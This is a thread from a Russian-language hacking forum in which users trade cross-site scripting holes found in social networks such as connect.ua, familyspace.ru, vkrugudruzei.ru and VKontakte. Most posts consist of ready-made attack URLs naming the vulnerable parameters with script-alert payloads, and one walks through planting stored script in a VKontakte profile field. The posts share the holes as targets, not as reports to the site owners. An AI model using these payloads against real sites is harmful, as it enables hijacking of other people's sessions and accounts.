ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Социальные сети
Перезагрузить страницу Уязвимости в соц. сетях
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в соц. сетях
  #1  
Старый 20.01.2009, 07:14
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию Уязвимости в соц. сетях
По многочисленным просьбам пользователей и одного из модераторов раздела Уязвимостей создана данная тема.

Теперь все уязвимости постим в этой теме. Отдельно созданные темы будут удаляться!
 
Ответить с цитированием

  #2  
Старый 20.01.2009, 08:21
Аватар для Shadow_p1raT
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
Буду пейвым

connect.ua

ХSS в панели Фотография

Код:
http://connect.ua/v2/profile?edit&photo&error=[XSS]
XSS в Поиске

Код:
http://connect.ua/v2/search?users=&q=">[XSS]
Ну и на десерт XSS в Личных сообщениях,поле Тема
Текст темы:

Код:
</title>[XSS]
А вообще ксс там повсюду.Интересно какую тарву курили разработчики
 
Ответить с цитированием

  #3  
Старый 20.01.2009, 14:56
Аватар для Shadow_p1raT
Shadow_p1raT
Участник форума
Регистрация: 09.03.2008
Сообщений: 193
Провел на форуме:
2140897

Репутация: 267
Отправить сообщение для Shadow_p1raT с помощью ICQ
По умолчанию
Familyspace.ru

XSS в Поиске

Код:
http://www.familyspace.ru/index.php?page=search&pn=1&first_nam=">[XSS]
XSS при просмотре профиля
Код:
http://www.familyspace.ru/index.php?page=profile&user_id=[тут id пользователя][XSS]
Пример
Код:
http://www.familyspace.ru/index.php?page=profile&user_id=75212<script>alert()</script>
А тут сходу 2 XSS уязвимая переменная message и from_page

Код:
http://www.familyspace.ru/index.php?page=edit_profile&message=">[XSS]&from_page=">[XSS]
Пример:
Код:
http://www.familyspace.ru/index.php?page=edit_profile&message="><script>alert(1)</script>&from_page="><script>alert(2)</script>
Наверно разработчики предыдущего проекта поделились травой с этими
 
Ответить с цитированием

  #4  
Старый 21.03.2009, 03:54
Аватар для s0l_ir0n
s0l_ir0n
Участник форума
Регистрация: 14.03.2009
Сообщений: 237
Провел на форуме:
813785

Репутация: 314
Отправить сообщение для s0l_ir0n с помощью ICQ
По умолчанию
http://majormo.ru
XSS в статусе. (выставляется через настройки профайла)
 
Ответить с цитированием

  #5  
Старый 27.03.2009, 04:34
Аватар для Failure
Failure
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893

Репутация: 102
По умолчанию
Код:
http://vkrugudruzei.ru/support/forget.asp?forgetemail=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E
только что нашел, что соц. сеть, что хсс
 
Ответить с цитированием

  #6  
Старый 05.06.2009, 00:01
Аватар для JOHNik
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521

Репутация: 34
Отправить сообщение для JOHNik с помощью ICQ
По умолчанию
все прикрыли тока что! быстро ребята работают!
для тех кто не вкурил рядом с вкладкой "Личная информация" есть ссылка "[редактировать]"
Пишем в форму (кроме форм "Любимые цитаты:" и "О себе:" ) например "Любимые фильмы:" [XSS] потом сохраняем
Появляется ссылка если по ней перейти наша [XSS] оказывается тут:
Код:
<script type="text/javascript">
 qCur = 4;
 ge('qinput').value='[XXS]';
 ge('qinput').focus();
 ge('qdrop').innerHTML = qArr[qCur][1];
 sOn = 1;
 newSearch = 1;
 function globalSearch() {
  var force = setCriteria(qArr[qCur][3], ge('qinput').value);
  updateResults(force);
  hide('qfriends');
  qfCur = -1;
  //  ge('qinput').blur();
 }
</script>
ну сами видите где! (сейчас админы вконтакте подредактировали этот блок, старого у меня не осталось) там то она и работала.
Я тут новичок, так что если че не так пишите в личку, буду рад =)))
Последний раз редактировалось JOHNik; 05.06.2009 в 04:21..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ